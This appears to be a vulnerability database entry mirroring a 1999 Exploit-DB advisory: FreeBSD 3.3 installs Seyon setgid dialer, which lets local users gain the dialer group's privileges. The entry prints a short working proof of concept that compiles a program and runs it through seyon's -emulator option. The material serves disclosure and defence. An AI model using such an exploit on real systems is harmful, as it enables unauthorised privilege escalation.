Lucene search
+L

FreeBSD 3.3 - Seyon SetGID Dialer

🗓️ 01 Dec 1999 00:00:00Reported by Brock TellierType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

FreeBSD 3.3 Seyon allows privilege elevation via setgid dialer vulnerabilities, enabling access.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-1999-0821
4 Feb 200005:00
cve
cvelist
Cvelist
CVE-1999-0821
4 Feb 200005:00
cvelist
exploitdb
Exploit DB
Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow
15 Jan 200100:00
exploitdb
euvd
EUVD
EUVD-1999-0802
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-0821
8 Nov 199905:00
nvd
source: https://www.securityfocus.com/bid/838/info

FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer.

One of the methods to exploit seyon is shown below:

bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.6
EPSS0.00769
33